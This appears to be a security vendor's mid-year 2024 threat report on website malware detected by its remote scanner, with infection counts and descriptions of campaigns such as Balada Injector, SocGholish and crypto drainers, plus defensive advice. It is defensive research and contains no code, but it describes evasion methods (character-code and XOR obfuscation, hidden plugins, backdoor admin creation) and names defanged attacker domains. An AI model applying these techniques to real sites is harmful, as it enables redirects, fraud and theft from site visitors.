Conducting an external website scan for indicators of compromise is one of the easiest ways to identify security issues. While remote website scanners may not provide as comprehensive of a scan as server-side scanners, they allow users to instantly identify malicious code and detect security issues on their website without installing any software or applications.
Our free SiteCheck remote website scanner provides immediate insights about malware infections, blocklisting, website anomalies, and errors for millions of websites every month.
In this report, we’ll be analyzing data from the first half of the year to identify the most common malware infections found by our SiteCheck remote scanner. We’ll also provide examples to help website owners understand how to identify malware in their own environments.
Website Malware Infections
In the first half of 2024, SiteCheck scanned a total of 53,234,574 websites. From this number we detected 681,182 infected sites, while another 101,819 sites were found to contain blocklisted resources.
Website infections can occur for a multitude of reasons. But most often, they’re the result of an attacker exploiting a vulnerable website for its valuable resources — credit card information, traffic, SEO, or even server resources.
We analyzed the most common signatures to pinpoint which types of malware were frequently detected on compromised systems. Injected malware and redirects were the most common infection seen in our remote scan data, followed by SEO Spam.
An overlap in distribution percentages exist, as hacked websites are often infected with more than one type of malware.
Malware & Redirects
A total of 473,135 sites were detected with injected malware and redirects, accounting for 69.46% of website infections detected by SiteCheck in the first half of 2024.
Malware in this category are defined as malicious external script injections, iframes, inline scripts – and exclude any detections already flagged as SEO spam. They are typically found injected into JavaScript files or nestled within a site’s HTML code.
Balada Injector
SiteCheck detected 100,470 sites injected with obfuscated scripts for the ongoing massive malware campaign known as Balada Injector, accounting for 21.23% of malware injections in the first half of 2024.
The Balada malware campaign was among the top infections that Sucuri’s remediation team cleaned so far this year, and is known to redirect site visitors to scams, ads and other malicious resources.
The JavaScript injections for this campaign are typically typically found in database options of vulnerable plugins, or appended to one or several legitimate .js files or injected into a header and/or footer of the page so that they fire on every page load and redirect traffic to the attacker’s final destination.
Character code obfuscation (decoded using String.fromCharCode) is a tell-tale sign of Balada injections, although in 2024 it’s not that obvious as they try to add other obfuscation layers. For example, here’s the most detected variation of the Balada script (soft.specialcraftbox[.]com) injected using the Popup Builder vulnerability:
When Balada scripts are injected as a link directly to a malicious third party website, they are detected as a blocklisted resource instead of a malware injection; an additional 11,668 websites were detected with blocklisted resources for Balada malware campaign in the first half of 2024. Over 80% of blocklisted Balada scripts pointed to various subdomains of startperfectsolutions[.]com.
Sign1
The Sign1 malware campaign is a massive and persistent threat that SiteCheck detected on 56,999 infected websites, accounting for 12.05% of malware injections in the first half of 2024. It employs deceptive tactics like obfuscating malicious code, dynamic URL generation with time-based randomization, and XOR encoding to evade detection.
When triggered on a compromised site, the malware injects malicious scripts that check the visitor’s referrer. If they arrived from major sites like Google or Facebook, it executes code to set tracking cookies and redirect victims to VexTrio scam sites displaying fake “allow if you’re not a robot” prompts.
To stay undetected, Sign1 malware is often injected into legitimate WordPress plugins like Simple Custom CSS and JS that allow inserting arbitrary code. This lets attackers modify site behavior without changing server files, which is harder for security scanners to catch. The malware domains are constantly rotated, using techniques like hexadecimal timestamps in URLs that only work for 10 minutes at a time.
SocGholish
Another malware injection of significant note was SocGholish, which was responsible for over 11.88% of injections in the first half of 2024. In addition to script injections, a total of 37,269 websites were found to contain external script tags pointing to known SocGholish domains.
This malware is responsible for redirecting site visitors to malicious pages designed to trick victims into installing fake browser updates. JavaScript is used to display notices in the victim’s web browser and initiate a download for remote access trojans, allowing the attacker to gain full access and remotely control the victim’s computer including mouse and keyboard, file access, and network resources. SocGholish is also known to be the first stage in ransomware attacks against large corporations.
In 2024, several distinct website malware campaigns were known to serve SocGholish malware:
In some cases, our remote scanner found more than one type of SocGholish infection on the same site.
NDSW
The ongoing NDSW/NDSX malware campaign — the most prevalent SocGolish variant — accounted for 43,106 detections in the first half of 2024.
What differentiates NDSW from so-called “vanilla” SocGholish code is that the malware references an NDSW (or NDSJ) variable and contains a custom wrapper used to dynamically serve the malicious injection through a PHP proxy.
Our remediation team often finds large numbers of impacted files for this infection, as attackers are known to inject the malware into every .js file on the hacked website.
The malware operates in two parts. Firstly, a malicious JavaScript injection (NDSW or NDSJ) is typically found injected within HTML at the end of an inline script or appended to the bottom of every .js file in the compromised environment. The second layer with the NDSX payload (responsible for SocGholish fake browser update pages) is served by a malicious PHP proxy script, which is typically located in a random directory on the same infected domain.
In addition to the common NDSW injections, we started detecting ZQXQ and ZQXW variations in the first half of 2024.
DNS TXT Records
Detected on 23,820 infected sites in the first half of 2024, the DNS TXT records malware campaign infects WordPress websites by injecting malicious code snippets through the WordPress plugins.
The malware fetches encrypted redirect URLs from dynamic DNS TXT records of attacker-controlled domains. These URLs lead to malicious sites that initiate redirect chains to VexTrio scam pages. Initially, the malware used client-side JavaScript injections, but in March 2024 switched to stealthier server-side PHP redirects.
The malware employs evasive techniques like hiding the plugin, disguising admin notifications, and introducing a cookie-based backdoor to update the DNS tracking domain or create rogue admin users. It also ensures persistence through the attacker’s bots, who reactivate the plugin whenever it is disabled.
Bogus URL Shorteners
Detected on 16,086 infected websites during the first half of 2024, the Bogus URL Shorteners malware campaign leverages URL shortening services to redirect website visitors to low-quality question and answer sites monetized through Google Adsense.
The malicious code is often injected into WordPress pages, posts, testimonials, or comments as obfuscated JavaScript containing multiple bogus URL shorteners. When executed on a mobile browser after a user interaction, it redirects visitors through several layers of intermediary sites mimicking Google search clicks before landing on the spam blogs displaying Google ads.
Web3 Crypto Drainers
SiteCheck detected Web3 Crypto Drainer malware on 9,966 infected websites in the first half of 2024. This campaign represents a recent surge involving a novel form of website malware targeting Web3 and cryptocurrency assets by injecting crypto drainers onto compromised websites.
These drainers use phishing tactics like misleading popups to trick visitors into connecting their cryptocurrency wallets to the malicious site. Once connected, the malware drains funds from the victim’s wallet by signing unauthorized transactions that transfer assets to the attacker’s wallet.
One of the biggest Crypto Drainer campaigns is called “Angel Drainer” which has been spreading these malicious injections across thousands of hacked websites since January 2024. The injected scripts create fake “Connect Wallet” popups that claim to be for accepting terms, claiming airdrops, or verifying the visitor’s wallet under false pretexts; signing these requests allows the drainer to access and drain the victim’s cryptocurrency funds.
Interested in more? View the rest of the data sets and malware samples for SEO spam, hidden content, credit card skimmers, unwanted ads, defacements, and more from our latest 2024 Mid-Year SiteCheck report.
TL;DR
This report revealed a number of insights from the first half of 2024 for our remote website scanner:
- SiteCheck detected malware on 681,182 infected sites from January 1st to June 30th, 2024.
- 234,033 sites were detected with SEO spam, accounting for 34.36% of website infections.
- 100,470 websites were detected with Balada Injector, the ongoing massive malware campaign targeting vulnerabilities in WordPress plugins and themes.
- 14.94% of infected websites were found to include external scripts or iframes referencing blocklisted domains.
While no security solution is 100% guaranteed to protect your website’s environment, there are a number of different solutions that you can utilize for an effective defense-in-depth strategy.
Always keep website software updated with the latest security patches to mitigate risk from software vulnerabilities — including plugins, themes, and core CMS. Consider employing file integrity monitoring or comprehensive website monitoring services to detect indicators of compromise and anomalies. Enforce strong, unique passwords for all user accounts. You can leverage a web application firewall to help filter out malicious traffic, block bad bots, virtually patch known vulnerabilities, and mitigate DDoS.
Do you have comments or suggestions for this report? We’d love to hear from you! Share your feedback on Twitter or email us labs@sucuri.net.